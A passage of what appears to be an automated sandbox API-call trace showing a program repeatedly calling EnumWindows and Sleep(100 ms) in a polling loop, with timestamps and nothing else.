(lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.806] Sleep (dwMilliseconds=0x64) [0130.807] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.807] Sleep (dwMilliseconds=0x64) [0130.809] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.810] Sleep (dwMilliseconds=0x64) [0130.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.811] Sleep (dwMilliseconds=0x64) [0130.813] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.813] Sleep (dwMilliseconds=0x64) [0130.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.815] Sleep (dwMilliseconds=0x64) [0130.816] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.817] Sleep (dwMilliseconds=0x64) [0130.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.818] Sleep (dwMilliseconds=0x64) [0130.820] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.820] Sleep (dwMilliseconds=0x64) [0130.821] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.822] Sleep (dwMilliseconds=0x64) [0130.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.823] Sleep (dwMilliseconds=0x64) [0130.824] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.825] Sleep (dwMilliseconds=0x64) [0130.826] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.826] Sleep (dwMilliseconds=0x64) [0130.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.828] Sleep (dwMilliseconds=0x64) [0130.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.831] Sleep (dwMilliseconds=0x64) [0130.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.847] Sleep (dwMilliseconds=0x64) [0130.849] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.849] Sleep (dwMilliseconds=0x64) [0130.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.850] Sleep (dwMilliseconds=0x64) [0130.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.852] Sleep (dwMilliseconds=0x64) [0130.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.853] Sleep (dwMilliseconds=0x64) [0130.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.856] Sleep (dwMilliseconds=0x64) [0130.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.858] Sleep (dwMilliseconds=0x64) [0130.859] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.859] Sleep (dwMilliseconds=0x64) [0130.860] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.860] Sleep (dwMilliseconds=0x64) [0130.862] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.862] Sleep (dwMilliseconds=0x64) [0130.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.863] Sleep (dwMilliseconds=0x64) [0130.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.865] Sleep (dwMilliseconds=0x64) [0130.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.867] Sleep (dwMilliseconds=0x64) [0130.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.869] Sleep (dwMilliseconds=0x64) [0130.870] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.870] Sleep (dwMilliseconds=0x64) [0130.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.872] Sleep (dwMilliseconds=0x64) [0130.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.876] Sleep (dwMilliseconds=0x64) [0130.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.878] Sleep (dwMilliseconds=0x64) [0130.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.879] Sleep (dwMilliseconds=0x64) [0130.880] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.881] Sleep (dwMilliseconds=0x64) [0130.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.882] Sleep (dwMilliseconds=0x64) [0130.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.884] Sleep (dwMilliseconds=0x64) [0130.886] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.887] Sleep (dwMilliseconds=0x64) [0130.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.888] Sleep (dwMilliseconds=0x64) [0130.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.890] Sleep (dwMilliseconds=0x64) [0130.892] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.892] Sleep (dwMilliseconds=0x64) [0130.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.893] Sleep (dwMilliseconds=0x64) [0130.895] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.895] Sleep (dwMilliseconds=0x64) [0130.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.896] Sleep (dwMilliseconds=0x64) [0130.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.898] Sleep (dwMilliseconds=0x64) [0130.900] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.900] Sleep (dwMilliseconds=0x64) [0130.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.902] Sleep (dwMilliseconds=0x64) [0130.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.904] Sleep (dwMilliseconds=0x64) [0130.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.905] Sleep (dwMilliseconds=0x64) [0130.907] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.907] Sleep (dwMilliseconds=0x64) [0130.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.909] Sleep (dwMilliseconds=0x64) [0130.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.910] Sleep (dwMilliseconds=0x64) [0130.912] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.912] Sleep (dwMilliseconds=0x64) [0130.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.914] Sleep (dwMilliseconds=0x64) [0130.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.916] Sleep (dwMilliseconds=0x64) [0130.917] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.918] Sleep (dwMilliseconds=0x64) [0130.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.919] Sleep (dwMilliseconds=0x64) [0130.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.921] Sleep (dwMilliseconds=0x64) [0130.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.923] Sleep (dwMilliseconds=0x64) [0130.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.925] Sleep (dwMilliseconds=0x64) [0130.927] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.927] Sleep (dwMilliseconds=0x64) [0130.930] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.930] Sleep (dwMilliseconds=0x64) [0130.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.931] Sleep (dwMilliseconds=0x64) [0130.933] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.933] Sleep (dwMilliseconds=0x64) [0130.934] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.935] Sleep (dwMilliseconds=0x64) [0130.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.936] Sleep (dwMilliseconds=0x64) [0130.938] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.938] Sleep (dwMilliseconds=0x64) [0130.940] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.940] Sleep (dwMilliseconds=0x64) [0130.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.942] Sleep (dwMilliseconds=0x64) [0130.946] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.946] Sleep (dwMilliseconds=0x64) [0130.947] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.947] Sleep (dwMilliseconds=0x64) [0130.949] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.949] Sleep (dwMilliseconds=0x64) [0130.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.951] Sleep (dwMilliseconds=0x64) [0130.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.952] Sleep (dwMilliseconds=0x64) [0130.954] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.954] Sleep (dwMilliseconds=0x64) [0130.957] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.957] Sleep (dwMilliseconds=0x64) [0130.958] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.958] Sleep (dwMilliseconds=0x64) [0130.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.960] Sleep (dwMilliseconds=0x64) [0130.962] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.963] Sleep (dwMilliseconds=0x64) [0130.964] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.964] Sleep (dwMilliseconds=0x64) [0130.966] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.966] Sleep (dwMilliseconds=0x64) [0130.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.968] Sleep (dwMilliseconds=0x64) [0130.970] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.970] Sleep (dwMilliseconds=0x64) [0130.971] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.971] Sleep (dwMilliseconds=0x64) [0130.973] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.973] Sleep (dwMilliseconds=0x64) [0130.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.974] Sleep (dwMilliseconds=0x64) [0130.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.976] Sleep (dwMilliseconds=0x64) [0130.977] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.977] Sleep (dwMilliseconds=0x64) [0130.979] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.982] Sleep (dwMilliseconds=0x64) [0130.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.983] Sleep (dwMilliseconds=0x64) [0130.984] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.985] Sleep (dwMilliseconds=0x64) [0130.986] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.986] Sleep (dwMilliseconds=0x64) [0130.987] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.988] Sleep (dwMilliseconds=0x64) [0130.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.989] Sleep (dwMilliseconds=0x64) [0130.990] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.991] Sleep (dwMilliseconds=0x64) [0130.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.992] Sleep (dwMilliseconds=0x64) [0130.994] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.994] Sleep (dwMilliseconds=0x64) [0130.996] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.996] Sleep (dwMilliseconds=0x64) [0131.000] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.000] Sleep (dwMilliseconds=0x64) [0131.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.001] Sleep (dwMilliseconds=0x64) [0131.003] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.003] Sleep (dwMilliseconds=0x64) [0131.004] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.004] Sleep (dwMilliseconds=0x64) [0131.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.006] Sleep (dwMilliseconds=0x64) [0131.007] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.007] Sleep (dwMilliseconds=0x64) [0131.009] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.009] Sleep (dwMilliseconds=0x64) [0131.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.011] Sleep (dwMilliseconds=0x64) [0131.012] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.012] Sleep (dwMilliseconds=0x64) [0131.014] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.014] Sleep (dwMilliseconds=0x64) [0131.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.015] Sleep (dwMilliseconds=0x64) [0131.017] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.017] Sleep (dwMilliseconds=0x64) [0131.021] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.021] Sleep (dwMilliseconds=0x64) [0131.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.022] Sleep (dwMilliseconds=0x64) [0131.024] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.024] Sleep (dwMilliseconds=0x64) [0131.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.025] Sleep (dwMilliseconds=0x64) [0131.027] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.027] Sleep (dwMilliseconds=0x64) [0131.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.028] Sleep (dwMilliseconds=0x64) [0131.030] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.030] Sleep (dwMilliseconds=0x64) [0131.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.031] Sleep (dwMilliseconds=0x64) [0131.033] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.033] Sleep (dwMilliseconds=0x64) [0131.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.034] Sleep (dwMilliseconds=0x64) [0131.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.036] Sleep (dwMilliseconds=0x64) [0131.047] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.047] Sleep (dwMilliseconds=0x64) [0131.049] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.049] Sleep (dwMilliseconds=0x64) [0131.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.050] Sleep (dwMilliseconds=0x64) [0131.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.052] Sleep (dwMilliseconds=0x64) [0131.054] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.054] Sleep (dwMilliseconds=0x64) [0131.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.055] Sleep (dwMilliseconds=0x64) [0131.088] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.088] Sleep (dwMilliseconds=0x64) [0131.181] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.181] Sleep (dwMilliseconds=0x64) [0131.183] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.183] Sleep (dwMilliseconds=0x64) [0131.184] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.184] Sleep (dwMilliseconds=0x64) [0131.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.186] Sleep (dwMilliseconds=0x64) [0131.189] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.189] Sleep (dwMilliseconds=0x64) [0131.190] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.191] Sleep (dwMilliseconds=0x64) [0131.192] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.192] Sleep (dwMilliseconds=0x64) [0131.193] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.194] Sleep (dwMilliseconds=0x64) [0131.195] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.195] Sleep (dwMilliseconds=0x64) [0131.197] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.197] Sleep (dwMilliseconds=0x64) [0131.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.198] Sleep (dwMilliseconds=0x64) [0131.199] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.200] Sleep (dwMilliseconds=0x64) [0131.201] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.201] Sleep (dwMilliseconds=0x64) [0131.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.203] Sleep (dwMilliseconds=0x64) [0131.204] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.204] Sleep (dwMilliseconds=0x64) [0131.205] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.206] Sleep (dwMilliseconds=0x64) [0131.207] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.207] Sleep (dwMilliseconds=0x64) [0131.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.209] Sleep (dwMilliseconds=0x64) [0131.210] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.210] Sleep (dwMilliseconds=0x64) [0131.211] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.212] Sleep (dwMilliseconds=0x64) [0131.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.213] Sleep (dwMilliseconds=0x64) [0131.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.218] Sleep (dwMilliseconds=0x64) [0131.219] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.220] Sleep (dwMilliseconds=0x64) [0131.221] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.221] Sleep (dwMilliseconds=0x64) [0131.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.223] Sleep (dwMilliseconds=0x64) [0131.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.225] Sleep (dwMilliseconds=0x64) [0131.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.226] Sleep (dwMilliseconds=0x64) [0131.227] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.228] Sleep (dwMilliseconds=0x64) [0131.229] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.229] Sleep (dwMilliseconds=0x64) [0131.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.231] Sleep (dwMilliseconds=0x64) [0131.233] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.233] Sleep (dwMilliseconds=0x64) [0131.235] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.235] Sleep (dwMilliseconds=0x64) [0131.236] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.236] Sleep (dwMilliseconds=0x64) [0131.239] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.239] Sleep (dwMilliseconds=0x64) [0131.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.240] Sleep (dwMilliseconds=0x64) [0131.241] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.242] Sleep (dwMilliseconds=0x64) [0131.246] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.246] Sleep (dwMilliseconds=0x64) [0131.248] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.248] Sleep (dwMilliseconds=0x64) [0131.250] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.250] Sleep (dwMilliseconds=0x64) [0131.253] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.254] Sleep (dwMilliseconds=0x64) [0131.257] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.257] Sleep (dwMilliseconds=0x64) [0131.258] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.259] Sleep (dwMilliseconds=0x64) [0131.260] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.260] Sleep (dwMilliseconds=0x64) [0131.261] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.262] Sleep (dwMilliseconds=0x64) [0131.263] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.263] Sleep (dwMilliseconds=0x64) [0131.265] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.265] Sleep (dwMilliseconds=0x64) [0131.267] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.267] Sleep (dwMilliseconds=0x64) [0131.268] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.269] Sleep (dwMilliseconds=0x64) [0131.270] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.270] Sleep (dwMilliseconds=0x64) [0131.271] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.272] Sleep (dwMilliseconds=0x64) [0131.277] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.277] Sleep (dwMilliseconds=0x64) [0131.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.279] Sleep (dwMilliseconds=0x64) [0131.280] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.280] Sleep (dwMilliseconds=0x64) [0131.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.282] Sleep (dwMilliseconds=0x64) [0131.308] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.308] Sleep (dwMilliseconds=0x64) [0131.310] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.310] Sleep (dwMilliseconds=0x64) [0131.311] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.311] Sleep (dwMilliseconds=0x64) [0131.313] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.313] Sleep (dwMilliseconds=0x64) [0131.314] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.314] Sleep (dwMilliseconds=0x64) [0131.316] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.316] Sleep (dwMilliseconds=0x64) [0131.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.317] Sleep (dwMilliseconds=0x64) [0131.319] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.319] Sleep (dwMilliseconds=0x64) [0131.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.320] Sleep (dwMilliseconds=0x64) [0131.322] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.322] Sleep (dwMilliseconds=0x64) [0131.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.323] Sleep (dwMilliseconds=0x64) [0131.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.325] Sleep (dwMilliseconds=0x64) [0131.326] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.326] Sleep (dwMilliseconds=0x64) [0131.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.328] Sleep (dwMilliseconds=0x64) [0131.329] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.329] Sleep (dwMilliseconds=0x64) [0131.331] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.331] Sleep (dwMilliseconds=0x64) [0131.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.334] Sleep (dwMilliseconds=0x64) [0131.344] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.344] Sleep (dwMilliseconds=0x64) [0131.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.407] Sleep (dwMilliseconds=0x64) [0131.409] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.409] Sleep (dwMilliseconds=0x64) [0131.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.411] Sleep (dwMilliseconds=0x64) [0131.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.412] Sleep (dwMilliseconds=0x64) [0131.415] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.415] Sleep (dwMilliseconds=0x64) [0131.417] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.417] Sleep (dwMilliseconds=0x64) [0131.418] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.419] Sleep (dwMilliseconds=0x64) [0131.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.420] Sleep (dwMilliseconds=0x64) [0131.421] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.422] Sleep (dwMilliseconds=0x64) [0131.423] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.423] Sleep (dwMilliseconds=0x64) [0131.424] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.425] Sleep (dwMilliseconds=0x64) [0131.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.426] Sleep (dwMilliseconds=0x64) [0131.427] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.428] Sleep (dwMilliseconds=0x64) [0131.429] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.429] Sleep (dwMilliseconds=0x64) [0131.430] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.431] Sleep (dwMilliseconds=0x64) [0131.432] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.432] Sleep (dwMilliseconds=0x64) [0131.433] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.434] Sleep (dwMilliseconds=0x64) [0131.435] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.435] Sleep (dwMilliseconds=0x64) [0131.436] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.437] Sleep (dwMilliseconds=0x64) [0131.438] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.443] Sleep (dwMilliseconds=0x64) [0131.444] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.444] Sleep (dwMilliseconds=0x64) [0131.445] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.446] Sleep (dwMilliseconds=0x64) [0131.447] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.447] Sleep (dwMilliseconds=0x64) [0131.448] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.449] Sleep (dwMilliseconds=0x64) [0131.450] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.450] Sleep (dwMilliseconds=0x64) [0131.451] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.452] Sleep (dwMilliseconds=0x64) [0131.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.453] Sleep (dwMilliseconds=0x64) [0131.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.455] Sleep (dwMilliseconds=0x64) [0131.456] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.457] Sleep (dwMilliseconds=0x64) [0131.458] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.458] Sleep (dwMilliseconds=0x64) [0131.459] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.460] Sleep (dwMilliseconds=0x64) [0131.461] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.461] Sleep (dwMilliseconds=0x64) [0131.462] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.463] Sleep (dwMilliseconds=0x64) [0131.464] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.464] Sleep (dwMilliseconds=0x64) [0131.466] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.466] Sleep (dwMilliseconds=0x64) [0131.467] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.468] Sleep (dwMilliseconds=0x64) [0131.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.469] Sleep (dwMilliseconds=0x64) [0131.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.471] Sleep (dwMilliseconds=0x64) [0131.472] EnumWindows 